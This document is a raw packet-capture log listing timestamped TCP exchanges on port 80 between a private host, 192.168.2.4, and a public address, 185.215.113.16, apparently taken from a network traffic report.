Dec 10, 2024 00:42:37.799767971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.800713062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.800761938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.800802946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.800846100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.801798105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.801847935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.801913023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.801958084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.802880049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.802928925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.802983999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.803035975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.803978920 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.804027081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.804084063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.804127932 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.805099010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.805149078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.805160046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.805200100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.806180000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.806230068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.806283951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.806332111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.807259083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.807308912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.807383060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.807431936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.808367968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.808414936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.808423042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.808463097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.809451103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.809498072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.809565067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.809608936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.810597897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.810642004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.810781002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.810825109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.811661005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.811712980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.811748981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.811798096 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.812741995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.812802076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.812830925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.812872887 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.813870907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.813918114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.813952923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.813992977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.814929962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.814976931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.815037012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.815083027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.816071987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.816118956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.816201925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.816247940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.817156076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.817198038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.817198992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.817233086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.818212032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.818259954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.818341017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.818384886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.819302082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.819349051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.819379091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.819422960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.820442915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.820488930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.820584059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.820630074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.821518898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.821567059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.821603060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.821647882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.822623014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.822669029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.822719097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.822765112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.823715925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.823762894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.823810101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.823857069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.824793100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.824841022 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.824896097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.824940920 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.825875044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.825922012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.825936079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.825978994 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.826993942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.827042103 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.827112913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.827157021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.828058004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.828123093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.828166962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.828213930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.829195023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.829242945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.829277039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.829323053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.830291033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.830339909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.830395937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.830446959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.831408024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.831459045 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.831484079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.831525087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.832458973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.832505941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.832586050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.832632065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.833568096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.833616972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.833707094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.833753109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.834647894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.834698915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.834753036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.834796906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.835777998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.835824966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.835861921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.835906029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.836832047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.836878061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.836956024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.836997986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.837959051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.838004112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.838064909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.838125944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.839049101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.839098930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.839138031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.839185953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.840159893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.840204954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.840264082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.840307951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.841234922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.841281891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.841283083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.841324091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.842327118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.842374086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.842453957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.842500925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.843416929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.843465090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.843492031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.843535900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.844547987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.844594955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.844686031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.844734907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.957360029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.957473040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.957490921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.957535028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.957909107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.957958937 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.957995892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.958040953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.958966017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.959011078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.959374905 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.959424019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.959445953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.959487915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.984428883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.984493971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.984524965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.984682083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.984911919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.984987020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.985018015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.985061884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.985980988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.986027002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.986090899 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.986130953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.987062931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.987112045 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.987138987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.987185001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.988153934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.988200903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.988267899 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.988318920 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.989272118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.989320040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.989375114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.989418030 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.990374088 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.990415096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.990422010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.990457058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.991455078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.991499901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.991559029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.991604090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.992554903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.992607117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.992758036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.992806911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.993654013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.993704081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.993762970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.993812084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.994731903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.994796038 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.994833946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.994879961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.995855093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.995906115 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.995934963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.995975018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.996936083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.996987104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.997034073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.997085094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.998018980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.998066902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.998147011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.998194933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.999121904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.999174118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.999233961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.999280930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.000205040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.000252962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.000401020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.000447989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.001290083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.001336098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.001482964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.001526117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.002394915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.002448082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.002501011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.002546072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.003614902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.003663063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.003709078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.003757954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.004568100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.004621983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.004703045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.004755974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.005671978 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.005722046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.005791903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.005836964 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.006781101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.006829023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.006861925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.006910086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.007865906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.007913113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.007962942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.008023024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.009001017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.009049892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.009167910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.009215117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.010071993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.010117054 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.010190964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.010241985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.011163950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.011214018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.011277914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.011320114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.012269974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.012319088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.012377977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.012423038 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.013353109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.013405085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.013437033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.013479948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.014451027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.014498949 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.014561892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.014609098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.015588045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.015635967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.015742064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.015789032 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.016664982 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.016712904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.016908884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.016956091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.017735958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.017796040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.017875910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.017925024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.018827915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.018872023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.018976927 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.019026041 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.020075083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.020124912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.020201921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.020268917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.021050930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.021102905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.021135092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.021178961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.022110939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.022157907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.022223949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.022269964 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.023221970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.023268938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.023340940 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.023386955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.024301052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.024347067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.024413109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.024461031 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.025413036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.025464058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.025553942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.025599003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.026494026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.026542902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.026595116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.026640892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.027631044 CET	80	49759	185.215.113.16	192.168.2.4
